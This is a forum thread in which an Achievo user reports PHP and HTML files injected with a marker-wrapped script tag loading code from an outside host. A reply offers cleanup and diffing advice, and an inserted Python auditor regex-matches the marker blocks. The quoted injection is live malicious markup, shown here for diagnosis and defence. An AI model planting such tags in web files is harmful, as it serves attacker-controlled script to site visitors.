All times are UTC + 1 hour





Virus
Posted: Tue Feb 12, 2013 10:41 am
Regular

Joined: Fri Feb 20, 2009 4:12 pm
Posts: 66
Location: France
Hello,

I think that a virus has infected the Achievo application. Here is the code:

Code:
<?
#148a41#
echo "<script type=\"text/javascript\" src=\"http://netstoragehost.com/1/ad.php?id=10\" name=\"umtx10\"></script>";
#/148a41#
?>


Code:
<!--148a41--><script type="text/javascript" src="http://netstoragehost.com/1/ad.php?id=10" name="umtx10"></script><!--/148a41-->


This code is inserted in JavaScript files and other files like index.php.

I did a search and found 120 infected files.

I deleted this code from all these files.

However, this virus came back a second time. I would like to know if you know of this problem.

Thanks for your help



Re: Virus
Posted: Tue Feb 12, 2013 6:04 pm
Regular

Joined: Mon Nov 21, 2005 11:53 pm
Posts: 260
Location: Calgary, AB, Canada
Nat82 wrote:
I think that a virus has infected the Achievo application...


Are you referring to the production code on your server? In other words, you do *not* mean code downloaded from http://www.achievo.org or http://www.github.com/atkphpframework/achievo?

Assuming you mean the code on your server has been modified since you downloaded Achievo and put it on the server, something must have intentionally modified the code (obvious, I know). However, the code you have found is only the result of an exploited vulnerability, and not the exploit itself. It is possible that other files have been modified, which then allowed the attacker to modify files with the code you found. If possible, I suggest you immediately replace your Achievo code with a new copy, but keep your current code and diff it against the new code to confirm if there have been any other changes.

Achievo (so far as I am aware) does not have the ability to modify index.php or any other file. How are you hosting Achievo? Are there any hosting tools involved that could have been exploited? Can your config.inc.php file be accessed from the internet (which would expose your administrator password, although I can't think of how that would enable modifying code files)? Have you modified Achievo in any way that could possibly have created a vulnerability?

Good luck!

_________________
Dale Scott
Transparency with Trust
http://www.dalescott.net
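
An added example, not part of any post in this thread: a Python sketch of the check suggested above, comparing the deployed tree against a fresh Achievo copy and flagging paired marker blocks like the ones quoted in the first post. Matching any 6-hex-digit marker id (not only 148a41) is an assumption that generalises the post; the file names and the injected.example URL are constructed sample data.

```python
import re
import tempfile
from pathlib import Path

# Paired markers as quoted in the first post: "#148a41# ... #/148a41#" in PHP
# and "<!--148a41--> ... <!--/148a41-->" in HTML/JS files.
# Assumption: the id is any 6-digit hex string, not only 148a41.
MARKER_BLOCKS = [
    re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.S),
    re.compile(r"<!--([0-9a-f]{6})-->(.*?)<!--/\1-->", re.S),
]
# Matches src="..." and the PHP-escaped form src=\"...\"
SCRIPT_SRC = re.compile(r"""src=\\?["']([^"'\\]+)""")

def find_injections(text):
    """Return (marker_id, [script src URLs]) for each paired marker block."""
    return [(m.group(1), SCRIPT_SRC.findall(m.group(2)))
            for pattern in MARKER_BLOCKS for m in pattern.finditer(text)]

def audit(clean_root, deployed_root):
    """Compare a deployed tree with a fresh copy; return {relpath: finding}."""
    clean_root, deployed_root = Path(clean_root), Path(deployed_root)
    report = {}
    for f in sorted(p for p in deployed_root.rglob("*") if p.is_file()):
        rel = f.relative_to(deployed_root).as_posix()
        ref = clean_root / rel
        if ref.is_file() and ref.read_bytes() == f.read_bytes():
            continue  # identical to the fresh copy
        status = "modified" if ref.is_file() else "added"
        report[rel] = (status, find_injections(f.read_text(errors="replace")))
    return report

def demo():
    """Audit constructed clean/deployed trees (sample data, not real files)."""
    tag = '<script src="http://injected.example/ad.php?id=10"></script>'
    php = '<?\n#148a41#\necho "' + tag.replace('"', '\\"') + '";\n#/148a41#\n?>\n'
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            root.mkdir()
            (root / "index.php").write_text("<?php echo 'ok'; ?>\n")
            (root / "menu.js").write_text("var a = 1;\n")
        (live / "index.php").write_text("<?php echo 'ok'; ?>\n" + php)
        (live / "menu.js").write_text("var a = 1;\n<!--148a41-->" + tag + "<!--/148a41-->\n")
        (live / "extra.php").write_text("<?php /* not in the fresh copy */ ?>\n")
        return audit(clean, live)

if __name__ == "__main__":
    for path, finding in demo().items():
        print(path, finding)
```

Files reported as "added" or as "modified" with no marker hit are the ones to read by hand, since they differ from the fresh copy in ways the marker pattern does not explain.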



Re: Virus
Posted: Wed Sep 18, 2013 8:12 am

Joined: Wed Sep 18, 2013 5:47 am
Posts: 5
Can someone suggest good antivirus software for my laptop?
Currently I am using AVAST, but I am not satisfied with its performance.

Your help will be greatly appreciated.

_____________________
Business Management Software


